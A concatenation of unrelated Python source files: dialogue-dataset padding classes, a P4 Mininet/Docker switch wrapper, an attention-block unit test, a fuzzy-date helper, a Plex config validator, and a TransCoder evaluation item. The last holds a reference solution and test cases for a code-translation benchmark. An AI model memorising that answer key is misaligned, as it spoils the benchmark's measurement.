the DTO-like class storing both the **padded to some specified length** training targets
of a dialog (to feed the GO-bot policy model)
"""
def __init__(self, dialogue_targets: DialogueTargets, sequence_length):
super().__init__()
padding_length = sequence_length - len(dialogue_targets)
self.action_ids = dialogue_targets.action_ids + [0] * padding_length
class PaddedDialogueDataEntry(DialogueDataEntry):
"""
the DTO-like class storing both the **padded to some specified length** training features and targets
of a dialog (to feed the GO-bot policy model)
"""
features: PaddedDialogueFeatures
targets: PaddedDialogueTargets
def __init__(self, dialogue_data_entry: DialogueDataEntry, sequence_length):
super().__init__()
self.features = PaddedDialogueFeatures(dialogue_data_entry.features, sequence_length)
self.targets = PaddedDialogueTargets(dialogue_data_entry.targets, sequence_length)
class BatchDialoguesFeatures:
"""
the DTO-like class storing both the training features
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_masks: List[List[np.ndarray]]
b_attn_keys: List[List[np.ndarray]]
b_tokens_embeddings_paddeds: List[List[np.ndarray]]
b_featuress: List[List[np.ndarray]]
b_padded_dialogue_length_mask: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_masks = []
self.b_attn_keys = []
self.b_tokens_embeddings_paddeds = []
self.b_featuress = []
self.b_padded_dialogue_length_mask = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_features: PaddedDialogueFeatures):
self.b_action_masks.append(padded_dialogue_features.action_masks)
self.b_attn_keys.append(padded_dialogue_features.attn_keys)
self.b_tokens_embeddings_paddeds.append(padded_dialogue_features.tokens_embeddings_paddeds)
self.b_featuress.append(padded_dialogue_features.featuress)
self.b_padded_dialogue_length_mask.append(padded_dialogue_features.padded_dialogue_length_mask)
def __len__(self):
return len(self.b_featuress)
class BatchDialoguesTargets:
"""
the DTO-like class storing both the training targets
of a batch of dialogues. (to feed the GO-bot policy model)
"""
b_action_ids: List[List[int]]
max_dialogue_length: int
def __init__(self, max_dialogue_length):
self.b_action_ids = []
self.max_dialogue_length = max_dialogue_length
def append(self, padded_dialogue_targets: PaddedDialogueTargets):
self.b_action_ids.append(padded_dialogue_targets.action_ids)
def __len__(self):
return len(self.b_action_ids)
class BatchDialoguesDataset:
"""
the DTO-like class storing both the training features and target
of a batch of dialogues. (to feed the GO-bot policy model)
Handles the dialogues padding.
"""
features: BatchDialoguesFeatures
targets: BatchDialoguesTargets
def __init__(self, max_dialogue_length):
self.features = BatchDialoguesFeatures(max_dialogue_length)
self.targets = BatchDialoguesTargets(max_dialogue_length)
self.max_dialogue_length = max_dialogue_length
def append(self, dialogue_features: DialogueDataEntry):
padded_dialogue_features = PaddedDialogueDataEntry(dialogue_features, self.max_dialogue_length)
self.features.append(padded_dialogue_features.features)
self.targets.append(padded_dialogue_features.targets)
def __len__(self):
return len(self.features)
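# Illustrative sketch (an editorial addition, not part of the original DeepPavlov
# module): the Padded* classes above pad each per-utterance sequence of a dialogue up
# to `sequence_length` -- zero-padding for the action-id targets, mirrored by a 1/0
# dialogue-length mask on the features side. The numbers below are made up.
if __name__ == "__main__":
    sequence_length = 5
    action_ids = [3, 1, 4]                                      # a 3-turn dialogue
    padding_length = sequence_length - len(action_ids)
    padded_action_ids = action_ids + [0] * padding_length       # [3, 1, 4, 0, 0]
    length_mask = [1] * len(action_ids) + [0] * padding_length  # [1, 1, 1, 0, 0]
    print(padded_action_ids, length_mask)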
|
mininet/p4_mininet.py | ghostli123/p4factory | 205 | 47529 | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, subprocess, select, time, re, pty
from mininet.util import isShellBuiltin
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print "**********"
print self.name
print "default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
)
print "**********"
class P4Switch(Switch):
"""P4 virtual switch"""
listenerPort = 11111
thriftPort = 22222
def __init__( self, name, sw_path = "dc_full",
thrift_port = None,
pcap_dump = False,
verbose = False, **kwargs ):
Switch.__init__( self, name, **kwargs )
self.sw_path = sw_path
self.verbose = verbose
logfile = '/tmp/p4ns.%s.log' % self.name
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
@classmethod
def setup( cls ):
pass
def start( self, controllers ):
"Start up a new P4 switch"
print "Starting P4 switch", self.name
args = [self.sw_path]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--listener', '127.0.0.1:%d' % self.listenerPort] )
self.listenerPort += 1
# FIXME
if self.thrift_port:
thrift_port = self.thrift_port
else:
thrift_port = self.thriftPort
self.thriftPort += 1
args.extend( ['--pd-server', '127.0.0.1:%d' % thrift_port] )
if not self.pcap_dump:
args.append( '--no-cli' )
args.append( self.opts )
logfile = '/tmp/p4ns.%s.log' % self.name
print ' '.join(args)
self.cmd( ' '.join(args) + ' >' + logfile + ' 2>&1 </dev/null &' )
#self.cmd( ' '.join(args) + ' > /dev/null 2>&1 < /dev/null &' )
print "switch has been started"
def stop( self ):
"Terminate IVS switch."
self.output.flush()
self.cmd( 'kill %' + self.sw_path )
self.cmd( 'wait' )
self.deleteIntfs()
def attach( self, intf ):
"Connect a data port"
print "Connecting data port", intf, "to switch", self.name
self.cmd( 'p4ns-ctl', 'add-port', '--datapath', self.name, intf )
def detach( self, intf ):
"Disconnect a data port"
self.cmd( 'p4ns-ctl', 'del-port', '--datapath', self.name, intf )
def dpctl( self, *args ):
"Run dpctl command"
pass
# Based on code from
# http://techandtrains.com/2014/08/21/docker-container-as-mininet-host/
class P4DockerSwitch(Switch):
"""P4 virtual switch running in a docker conatiner"""
def __init__( self, name, target_name = 'p4dockerswitch',
thrift_port = None, target_dir = 'switch',
sai_port = None,
swapi_port = None,
pcap_dump = False,
verbose = False,
start_program = '/p4factory/tools/start.sh',
config_fs = None,
pps = 0,
qdepth = 0,
**kwargs ):
self.verbose = verbose
self.pcap_dump = pcap_dump
self.start_program = start_program
self.config_fs = config_fs
self.target_name = target_name
self.target_dir = target_dir
self.thrift_port = thrift_port
self.sai_port = sai_port
self.swapi_port = swapi_port
self.pps = pps
self.qdepth = qdepth
Switch.__init__( self, name, **kwargs )
self.inNamespace = True
@classmethod
def setup( cls ):
pass
def sendCmd( self, *args, **kwargs ):
assert not self.waiting
printPid = kwargs.get( 'printPid', True )
# Allow sendCmd( [ list ] )
if len( args ) == 1 and type( args[ 0 ] ) is list:
cmd = args[ 0 ]
# Allow sendCmd( cmd, arg1, arg2... )
elif len( args ) > 0:
cmd = args
# Convert to string
if not isinstance( cmd, str ):
cmd = ' '.join( [ str( c ) for c in cmd ] )
if not re.search( r'\w', cmd ):
# Replace empty commands with something harmless
cmd = 'echo -n'
self.lastCmd = cmd
printPid = printPid and not isShellBuiltin( cmd )
if len( cmd ) > 0 and cmd[ -1 ] == '&':
# print ^A{pid}\n{sentinel}
cmd += ' printf "\\001%d\\012" $! '
else:
pass
self.write( cmd + '\n' )
self.lastPid = None
self.waiting = True
def popen( self, *args, **kwargs ):
mncmd = [ 'docker', 'exec', "mininet-"+self.name ]
return Switch.popen( self, *args, mncmd=mncmd, **kwargs )
def stop( self ):
dev_null = open(os.devnull, 'w')
subprocess.call( ['docker stop mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
subprocess.call( ['docker rm mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
dev_null.close()
def terminate( self ):
self.stop()
def start( self, controllers ):
print "Starting P4 docker switch", self.name
path = '/p4factory/targets/switch/behavioral-model'
args = [ 'echo \"' + path ]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
args.extend( ['--pd-server', '127.0.0.1:22000'] )
if not self.pcap_dump:
args.append( '--no-pcap' )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--pps', self.pps] )
args.extend( ['--qdepth', self.qdepth] )
# Enable it for verbose logs from model
#args.append( '-t' )
args.append( '--no-veth' )
args.append( '>& /tmp/model.log &' )
args.append( '\" >> /p4factory/tools/bm_start.sh' )
self.cmd( args )
bm_cmd = ['docker', 'exec', 'mininet-' + self.name,
'/p4factory/tools/bm_start.sh' ]
bmp = subprocess.Popen( bm_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
bmp.wait()
def startShell( self ):
self.stop()
docker_name = self.target_name
args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
args.extend( ['--hostname=' + self.name, '--name=mininet-' + self.name] )
if self.thrift_port is not None:
args.extend( ['-p', '%d:22000' % self.thrift_port] )
if self.sai_port is not None:
args.extend( ['-p', '%d:9092' % self.sai_port] )
if self.swapi_port is not None:
args.extend( ['-p', '%d:9091' % self.swapi_port] )
args.extend( ['-e', 'DISPLAY'] )
args.extend( ['-v', '/tmp/.X11-unix:/tmp/.X11-unix'] )
if self.config_fs is not None:
args.extend( ['-v',
os.getcwd() + '/' + self.config_fs + ':/configs'] )
args.extend( [docker_name, self.start_program] )
master, slave = pty.openpty()
self.shell = subprocess.Popen( args,
stdin=slave, stdout=slave, stderr=slave,
close_fds=True,
preexec_fn=os.setpgrp )
os.close( slave )
ttyobj = os.fdopen( master, 'rw' )
self.stdin = ttyobj
self.stdout = ttyobj
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
self.waiting = False
#Wait for prompt
time.sleep(1)
pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
'mininet-' + self.name ]
pidp = subprocess.Popen( pid_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
pidp.wait()
ps_out = pidp.stdout.readlines()
self.pid = int(ps_out[0])
self.cmd( 'export PS1=\"\\177\"; printf "\\177"' )
self.cmd( 'stty -echo; set +m' )
|
tests/test_axial_att_block.py | Siyuan89/self-attention-cv | 759 | 47574 | <reponame>Siyuan89/self-attention-cv
import torch
from self_attention_cv import AxialAttentionBlock
def test_axial_att():
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = AxialAttentionBlock(in_channels=256, dim=64, heads=8).to(device)
x = torch.rand(1, 256, 64, 64).to(device) # [batch, tokens, dim, dim]
y = model(x)
assert y.shape == x.shape
print('AxialAttentionBlockAISummer OK')
|
common/util/dates.py | jmcollis/GitSavvy | 2,058 | 47586 | <reponame>jmcollis/GitSavvy
from datetime import datetime
TEN_MINS = 600
ONE_HOUR = 3600
TWO_HOURS = 7200
ONE_DAY = 86400
def fuzzy(event, base=None, date_format=None):
if not base:
base = datetime.now()
if date_format:
event = datetime.strptime(event, date_format)
elif type(event) == str:
event = datetime.fromtimestamp(int(event))
elif type(event) == int:
event = datetime.fromtimestamp(event)
elif type(event) != datetime:
raise Exception(
"Cannot convert object `{}` to fuzzy date string".format(event))
delta = base - event
if delta.days == 0:
if delta.seconds < 60:
return "{} seconds ago".format(delta.seconds)
elif delta.seconds < 120:
return "1 min and {} secs ago".format(delta.seconds - 60)
elif delta.seconds < TEN_MINS:
return "{} mins and {} secs ago".format(
delta.seconds // 60,
delta.seconds % 60)
elif delta.seconds < ONE_HOUR:
return "{} minutes ago".format(delta.seconds // 60)
elif delta.seconds < TWO_HOURS:
return "1 hour and {} mins ago".format(
delta.seconds % ONE_HOUR // 60)
return "over {} hours ago".format(delta.seconds // ONE_HOUR)
elif delta.days < 2:
return "over a day ago"
elif delta.days < 7:
return "over {} days ago".format(delta.days)
return "{date:%b} {date.day}, {date.year}".format(date=event)
|
app/scripts/config_check.py | PromoFaux/plex-utills | 179 | 47591 | #!/usr/local/bin/python3
import os
import subprocess
from subprocess import Popen, PIPE, STDOUT
from configparser import ConfigParser
import subprocess
import plexapi
import schedule
import time
from datetime import datetime
import re
from colorama import Fore, Back, Style
import socket
from urllib import parse
from plexapi.server import PlexServer
config_object = ConfigParser()
config_object.read("/config/config.ini")
server = config_object["PLEXSERVER"]
schedules = config_object["SCHEDULES"]
options = config_object["OPTIONS"]
hdr_4k_posters = str.lower((options["4k_hdr_posters"]))
poster_3d = str.lower((options["3D_posters"]))
Disney = str.lower((options["Disney"]))
Pixar = (str.lower(options["Pixar"]))
hide_4k = str.lower((options["hide_4k"]))
pbak = str.lower((options["POSTER_BU"]))
HDR_BANNER = str.lower((options["HDR_BANNER"]))
optimise = str.lower((options["transcode"]))
mini_4k = str.lower((options["mini_4k"]))
mini_3d = str.lower((options["mini_3D"]))
t1 = (schedules["4k_poster_schedule"])
t2 = (schedules["disney_schedule"])
t3 = (schedules["pixar_schedule"])
t4 = (schedules["hide_poster_schedule"])
t5 = (schedules["3d_poster_schedule"])
url = parse.urlparse(server["PLEX_URL"]).hostname
try:
url = parse.urlparse(server["PLEX_URL"]).hostname
socket.inet_aton(url)
except socket.error:
raise Exception("Uh-Oh, it looks like your PLEX_URL is not correct in the config file \n Make sure you enter it as 'http://ip-address:plex-port'")
if server["TOKEN"] == '<token>':
raise Exception("You must add your Plex Token to the config file.")
try:
print("Your Server's Friendly name is ", PlexServer((server["PLEX_URL"]), (server["TOKEN"])).friendlyName)
except :
print('Cannot access your Plex account, please make sure that your Plex URL and Token are correct')
exit()
if pbak == 'true':
pass
elif pbak == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if HDR_BANNER == 'true':
pass
elif HDR_BANNER == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if mini_4k == 'true':
pass
elif mini_4k == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if hdr_4k_posters == 'true':
pass
elif hdr_4k_posters == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if poster_3d == 'true':
pass
elif poster_3d == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if Disney == 'true':
pass
elif Disney == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if Pixar == 'true':
pass
elif Pixar == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if hide_4k == 'true':
pass
elif hide_4k == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
if optimise == 'true':
pass
elif optimise == 'false':
pass
else:
raise ValueError('SYNTAX ERROR: Please enter either "true" or "false" to set the script behaviour.')
a = re.compile("^[0-9]{2}:[0-9]{2}$")
if a.match(t1) and hdr_4k_posters == 'true':
pass
elif hdr_4k_posters != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t5) and poster_3d == 'true':
pass
elif poster_3d != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t2) and Disney == 'true':
pass
elif Disney != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t3) and Pixar == 'true':
pass
elif Pixar != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
if a.match(t4) and hide_4k == 'true':
pass
elif hide_4k != 'true':
pass
else:
raise ValueError('Please make sure that your scheduled times are written in the format HH:MM')
print('Config check passed')
p = Popen('python -u ./run_all.py', shell=True)
output = p.communicate()
print(output[0])
|
data/transcoder_evaluation_gfg/python/COUNT_PAIRS_TWO_SORTED_ARRAYS_WHOSE_SUM_EQUAL_GIVEN_VALUE_X_2.py | mxl1n/CodeGen | 241 | 47659 | <gh_stars>100-1000
# Copyright (c) 2019-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
def f_gold ( arr1 , arr2 , m , n , x ) :
count , l , r = 0 , 0 , n - 1
while ( l < m and r >= 0 ) :
if ( ( arr1 [ l ] + arr2 [ r ] ) == x ) :
l += 1
r -= 1
count += 1
elif ( ( arr1 [ l ] + arr2 [ r ] ) < x ) :
l += 1
else :
r -= 1
return count
#TOFILL
if __name__ == '__main__':
param = [
([5, 5, 7, 10, 14, 14, 17, 21, 32, 34, 37, 40, 40, 40, 46, 46, 50, 50, 51, 55, 57, 62, 65, 67, 67, 69, 70, 70, 72, 73, 76, 77, 77, 78, 84, 85, 85, 86, 87, 88, 88, 89, 89, 90, 93, 99],[2, 5, 8, 8, 10, 12, 13, 15, 17, 18, 20, 20, 21, 27, 28, 31, 34, 37, 40, 46, 48, 52, 53, 54, 54, 58, 59, 60, 66, 68, 68, 69, 70, 71, 72, 73, 77, 77, 80, 84, 84, 92, 92, 95, 97, 97],28,29,23,),
([-84, 52, -34, 96, 16, 92, -64, -74],[-22, 26, -12, -54, 66, 86, 38, 76],6,5,7,),
([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],37,26,42,),
([60, 92, 42, 83, 55, 76, 29, 62],[71, 2, 74, 42, 80, 71, 26, 76],4,7,7,),
([-94, -94, -58, -40, -40, -26, -24, -22, -22, -22, -2, 0, 4, 8, 12, 16, 16, 18, 22, 32, 42, 44, 50, 58, 64, 78, 80, 90],[-86, -84, -78, -76, -72, -70, -62, -58, -54, -54, -50, -46, -44, -40, -30, -28, -16, -10, 10, 36, 36, 48, 70, 84, 84, 90, 94, 98],17,27,17,),
([0, 0, 1, 1, 1, 0, 0, 1, 1, 1],[1, 1, 1, 0, 1, 1, 0, 0, 0, 0],5,8,9,),
([1, 5, 7, 7, 7, 14, 15, 16, 17, 18, 18, 19, 20, 25, 27, 31, 36, 42, 47, 51, 56, 56, 56, 58, 58, 59, 63, 63, 63, 65, 66, 67, 76, 83, 93, 94, 97],[2, 3, 7, 8, 9, 10, 17, 18, 21, 28, 29, 29, 33, 35, 46, 47, 47, 49, 49, 49, 53, 56, 58, 59, 59, 60, 65, 67, 70, 78, 81, 85, 85, 87, 90, 92, 96],28,34,31,),
([78, -74, 52, 56, -8, 92, 14, 56, -72, -92, 32, -94, -26, -8, -66, 72, -24, 36, -84, -4, -68, 14, 78, 40, -82, -10, 16, 56, 6, -16, 30, 24, -32],[-74, 22, -14, -2, 36, 86, -70, -20, -76, -84, -40, -36, 42, 22, -60, -94, -18, 8, -14, -42, -68, 62, -60, 2, 40, -66, 68, 96, 70, 98, -38, -74, -92],16,30,24,),
([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],25,33,33,),
([17, 50, 65, 4, 19, 10, 45, 70, 76, 81, 28, 97, 55, 70, 38, 2, 40, 67, 36, 33, 6, 85, 25],[78, 92, 65, 23, 7, 94, 18, 4, 2, 53, 31, 58, 98, 18, 46, 16, 17, 92, 80, 92, 43, 70, 50],16,22,22,)
]
n_success = 0
for i, parameters_set in enumerate(param):
if f_filled(*parameters_set) == f_gold(*parameters_set):
n_success+=1
print("#Results: %i, %i" % (n_success, len(param))) |